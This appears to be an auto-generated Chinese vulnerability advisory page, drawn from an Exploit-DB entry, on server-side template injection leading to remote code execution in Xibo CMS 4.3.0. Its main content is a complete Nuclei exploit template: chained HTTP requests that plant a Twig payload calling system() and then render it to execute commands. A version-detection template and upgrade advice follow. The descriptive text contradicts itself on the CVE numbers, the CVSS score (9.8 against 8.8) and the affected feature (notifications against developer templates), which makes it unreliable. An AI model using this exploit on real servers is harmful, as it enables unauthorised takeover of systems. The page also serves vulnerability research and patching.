[webapps] Xibo CMS 4.3.0 - RCE via SSTI
CVE-2025-62639CVE-2025-62369
Xibo CMS 4.3.0 因 SSTI 导致远程代码执行
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-62639CVE-2025-62369 |
|---|---|
| 漏洞类型 | 服务器端模板注入RCE |
| 受影响版本 | Xibo CMS 4.3.0 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-04-29 |
| 提交者 | Cristian Branet |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
Xibo CMS 在渲染通知内容时,未对用户可控的模板输入进行安全过滤,允许攻击者在模板中注入 Twig/Smarty 表达式,最终导致代码执行
🎯 攻击场景
1. 攻击者需具备管理员或通知创建权限。2. 在创建通知时,将恶意 SSTI Payload 填入通知内容字段。3. 当系统渲染通知时,Payload 被执行,触发远程代码执行。成功标志为在服务器上执行任意命令(如反弹 shell、写入 Webshell)
💥 漏洞影响
攻击者可实现远程代码执行,完全控制服务器,造成数据泄露、勒索、横向移动等严重危害。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-62639-exploit
info:
name: Xibo CMS - Authenticated Remote Code Execution via SSTI
author: ai
severity: critical
description: Exploits CVE-2025-62639 in Xibo CMS (< 4.3.1) to achieve authenticated remote code execution via Server-Side Template Injection in the developer template feature. Requires a valid PHPSESSID.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-62639
- https://cristibtz.github.io/posts/CVE-2025-62369/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2025-62639
tags: xibo,cms,rce,ssti,authenticated
variables:
session: "{{session}}" # Must be provided by user, e.g., -var 'session=abc123'
cmd: "id"
http:
- raw:
- |
GET /statusdashboard HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{session}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
extractors:
- type: regex
name: xsrf_token
part: body
regex:
- 'name="token" content="([a-f0-9]+)"'
group: 1
- type: kval
name: timestamp
internal: true
part: header
kval:
- Date
- raw:
- |
POST /developer/template HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{session}}
X-XSRF-TOKEN: {{xsrf_token}}
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
templateId=exploit_poc_{{timestamp}}&title=Template+for+PoC&dataType=article©TemplateId=&showIn=layout
extractors:
- type: json
name: module_template_id
part: body
json:
- '.id'
- type: json
name: name
part: body
json:
- '.templateId // "exploit_poc_{{timestamp}}"'
- raw:
- |
PUT /developer/template/{{module_template_id}} HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{session}}
X-XSRF-TOKEN: {{xsrf_token}}
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
templateId={{name}}&title=Template+for+PoC+-+{{name}}&dataType=article&showIn=layout&enabled=on&developer-template-properties=%5B%5D&properties=%5B%5D&twig=<div+style%3D"background%3A+red%3B+color%3A+white%3B+font-size%3A+24px%3B+padding%3A+20px%3B">Command+Execution%3A+{{%5B%22{{cmd}}%22%5D%7Cfilter(%27system%27)}}+<br><%2Fdiv>&hbs=&style=&head=&onTemplateRender=&onTemplateVisible=&isInvalidateWidget=on
- raw:
- |
POST /template HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{session}}
X-XSRF-TOKEN: {{xsrf_token}}
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
folderId=1&name=exploit_poc_template_{{timestamp}}&tags=&tagValueInput=&resolutionId=1&description=Exploit+template
extractors:
- type: json
name: normal_template_id
part: body
json:
- '.id'
- type: json
name: layout_id
part: body
json:
- '.data.layoutId'
- type: json
name: region_id
part: body
json:
- '.data.regions[0].regionId'
- type: json
name: playlist_id
part: body
json:
- '.data.regions[0].regionPlaylist.playlistId'
- raw:
- |
POST /playlist/widget/rss-ticker/{{playlist_id + 1}} HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{session}}
X-XSRF-TOKEN: {{xsrf_token}}
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
templateId={{name}}
extractors:
- type: json
name: widget_id
part: body
json:
- '.id'
- raw:
- |
GET /playlist/widget/resource/{{playlist_id + 1}}/{{widget_id}}?preview=1&isEditor=1 HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{session}}
X-XSRF-TOKEN: {{xsrf_token}}
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
matchers-condition: and
matchers:
- type: word
part: body
words:
- "uid="
- "root:"
condition: or
- type: status
status:
- 200🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-62639-detection
info:
name: Xibo CMS - Version Detection
author: ai
severity: info
description: Detects Xibo CMS version to check if it is vulnerable to CVE-2025-62639 (SSTI RCE) affecting versions < 4.3.1.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-62639
- https://github.com/xibosignage/xibo-cms/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2025-62639
tags: xibo,cms,detection
http:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Xibo CMS"
- "content=\"Xibo"
- type: word
part: body
words:
- "v4.3.0"
extractors:
- type: regex
part: body
name: version
regex:
- 'Xibo CMS v([0-9]+\.[0-9]+\.[0-9]+)'
group: 1🛡️ 修复建议
升级至 Xibo CMS 4.3.1 或更高版本;临时缓解措施:禁用通知模块中对用户输入模板渲染的功能,或在模板引擎中开启沙箱模式并限制危险函数。
📎 参考链接
- https://nvd.nist.gov/vuln/detail/CVE-2025-62639
- https://nvd.nist.gov/vuln/detail/CVE-2025-62369
- Exploit-DB 原文
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 05:41 | 来源: Exploit-DB